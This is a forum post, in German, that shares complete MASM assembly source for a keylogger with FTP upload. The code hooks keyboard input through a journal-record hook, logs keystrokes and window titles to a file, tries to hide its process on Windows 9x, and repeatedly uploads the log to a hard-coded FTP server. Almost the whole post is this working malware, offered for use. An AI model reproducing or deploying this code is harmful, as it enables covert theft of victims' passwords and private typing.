[Masm] Keylogger mit FTP Upload [Source]

Hier ein Simpler Keylogger mit FTP Upload von DaRkReD aus OpenSc.ws, sehr kleine Filesize.

;Alpha FTP logger
;By DaRkReD
;Released on 3/31/2011

.486
.model flat, stdcall  
option casemap :none  

include C:\masm32\include\windows.inc
include C:\masm32\include\kernel32.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\wininet.inc

includelib C:\masm32\lib\kernel32.lib
includelib C:\masm32\lib\user32.lib
includelib C:\masm32\lib\wininet.lib   

JournalLogHook PROTO :DWORD, :DWORD, :DWORD
NAME_BUFF_SIZE = MAX_COMPUTERNAME_LENGTH + 1

.data
	appName DB 'Caller', 0 
	FTPAddress DB '192.168.1.66', 0 
	Username DB 'nobody', 0 
	Password DB,'redacted' 0 

	localFile DB 'key.txt', 0 
	remoteFile DB 'test3.txt', 0 

	hInternet HANDLE ? 
	hConnect HANDLE ?

	bracket1 db "<"
	bracket2 db ">"
	linefeed db 13,10,13,10,"[> %s <]",13,10,0;
	isLogging dd 1
	vKey dd 0
	nScan dd 0
	dwCount dd 0
	schar db 2 dup (0)
	kernel_name db "kernel32.dll", 0
	kernel_function db "RegisterServiceProcess", 0
	nSize dd NAME_BUFF_SIZE
	keyvalz db "Key.txt"
	logfilecon db 14 dup(?)
	logfileN db "Keyz.txt", 16 dup(0) 
	zlogfilecon db 14 dup(?)
	alogfilecon db  255 dup(?)
	drive db "C:\",0

	  random_seed  dd ?
  res  dd 0
  sFmt    db 'C:\%u',0
  sBuf    db 10 dup(0)

	.data?
	ThreadID DWORD ?
	logfile db 261 dup (?)
	hinstance HINSTANCE ?
	aMsg MSG <?>
	LogHook dd ?
	svBuffer dword ?
	WinDir db  35 dup(?)
	MyPath db  256 dup(?)
	kBuffer db 256 dup (?)
	kFwin db 256 dup (?)
	kGkl db 256 dup (?)
	wBuffer db 512 dup (?)
	chcount dd ?
	dwBytes dd ?
	aFocus dd ?
	lFocus dd ?
	lastvKey dd ? 
	NameBuffer  db NAME_BUFF_SIZE dup(?)

.code

ThreadProc proc
;----FTP UPLOAD----
FTP:
	Invoke InternetOpen, Addr appName, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0 
	Mov hInternet, Eax 
	Invoke InternetConnect, hInternet, Addr FTPAddress, INTERNET_DEFAULT_FTP_PORT, Addr Username, Addr Password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0 
	Mov hConnect, Eax 
	Invoke FtpPutFile, hConnect, Addr localFile, Addr remoteFile, FTP_TRANSFER_TYPE_BINARY, 0 
	Invoke InternetCloseHandle, hConnect 
	Invoke InternetCloseHandle, hInternet
	Invoke Sleep,300
	jmp FTP
ThreadProc endp

JournalLogHook proc uses edi code:DWORD, wParam:WPARAM, lParam:LPARAM
	LOCAL filehandle:dword 
	.if code < 0
	invoke CallNextHookEx, LogHook, code, wParam, lParam
	ret
	.endif
	.if code == HC_ACTION
	mov edi, lParam
	assume edi:ptr EVENTMSG
	.if [edi].message == WM_KEYDOWN 
	mov eax, [edi].paramL 
	mov ah, 0 
	mov vKey, eax 
	mov eax, [edi].paramL 
	mov al, 0 
	shl eax, 8 
	mov nScan, eax 

invoke CreateFile, addr alogfilecon,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
	mov filehandle, eax
	invoke SetFilePointer, filehandle,NULL, NULL, FILE_END
	invoke GetKeyNameText, nScan,addr svBuffer, 256
	mov dwCount, eax 
	invoke GetActiveWindow
	mov aFocus, eax
	.if eax != lFocus
	mov lFocus, eax
	invoke GetWindowText, aFocus, addr kBuffer, 256
	mov chcount, eax
	.if chcount > 0
	invoke wsprintf, addr wBuffer, addr linefeed, addr kBuffer
	invoke lstrlen, addr wBuffer
	mov chcount, eax
	invoke WriteFile, filehandle, addr wBuffer, chcount, addr dwBytes, NULL
	.endif
	.endif
	.if dwCount > 0
	.if vKey == VK_SPACE 
	mov svBuffer, 32 
	mov svBuffer + 1, 0 
	mov dwCount, 1 
	.endif
	.if vKey == VK_CAPITAL 
	mov svBuffer,0 
	mov dwCount,1
	.endif
	.if vKey == VK_SHIFT
	mov svBuffer,0
	mov dwCount,1
	.endif
	.if dwCount == 1
	.if lastvKey != 186
	invoke GetKeyboardState, addr kBuffer
	invoke GetForegroundWindow
	invoke GetWindowThreadProcessId,eax,0
	invoke GetKeyboardLayout ,eax;
	invoke ToAsciiEx, vKey, nScan, addr kBuffer, addr schar, 0 ,eax 
	mov chcount, eax
	.else
	mov chcount, 1
	mov eax, vKey
	mov schar, al
	.endif
	.if chcount > 0
	invoke WriteFile, filehandle, addr schar, chcount, addr dwBytes, NULL
	.endif
	.else
	invoke WriteFile, filehandle, addr bracket1, 1, addr dwBytes, NULL
	invoke WriteFile, filehandle, addr svBuffer, dwCount, addr dwBytes, NULL
	invoke WriteFile, filehandle, addr bracket2, 1, addr dwBytes, NULL
	.if vKey == VK_RETURN
	invoke WriteFile, filehandle, addr linefeed, 2, addr dwBytes, NULL
	.endif
	.endif
	mov eax, vKey
	mov lastvKey, eax
	.endif
	invoke CloseHandle, filehandle
	.endif
	.endif
	invoke CallNextHookEx, LogHook, code, wParam, lParam

	ret 

	JournalLogHook endp

	str_cat proc strBase:DWORD, strAdd:DWORD
			mov edi, strBase
			mov al, 0
			repne scasb
			dec edi
			mov esi, strAdd
			@@:
				mov al, [esi]
				mov [edi], al
				inc esi
				inc edi
				test al, al
				jnz @B
				ret
		str_cat endp

	Random proc dwBase:dword
  push    ebx  
  mov  eax,dwBase  
  xor  ebx,ebx  
  imul    edx,random_seed,08088405h  
  inc  edx  
  mov  random_seed,edx  
  mul  edx  
  mov  eax,edx  
  pop  ebx  
  ret
  Random endp

  Randomize proc  
  invoke  GetTickCount
  mov  random_seed,eax  
  ret
  Randomize endp

	start:

	invoke  Randomize
    invoke  Random,9000
    mov  res,EAX
    invoke wsprintf,ADDR sBuf,ADDR sFmt,res 

	invoke lstrcpy,ADDR zlogfilecon,ADDR sBuf
	invoke str_cat,ADDR zlogfilecon,ADDR keyvalz

	invoke lstrcpy,ADDR alogfilecon,ADDR drive
	invoke lstrcat,ADDR alogfilecon,ADDR zlogfilecon

	;try to hide only 9x
	invoke GetModuleHandle, ADDR kernel_name
	invoke GetProcAddress, eax, ADDR kernel_function
	.if eax != NULL
	push 1
	push 0
	call eax
	.endif
	invoke GetModuleHandle, NULL
	;--

	mov hinstance, eax
	invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
	mov LogHook, eax
	mov eax,OFFSET ThreadProc
	invoke CreateThread,NULL,NULL,eax,NULL,0,ADDR ThreadID

	.while isLogging == 1 
	invoke WaitMessage 
	invoke GetMessage, addr aMsg, NULL, 0, 0 
	invoke SetKeyboardState, addr kBuffe

	invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL 
	mov LogHook, eax 
	.endw 

	invoke UnhookWindowsHookEx,addr LogHook
	invoke ExitProcess, 0 

end start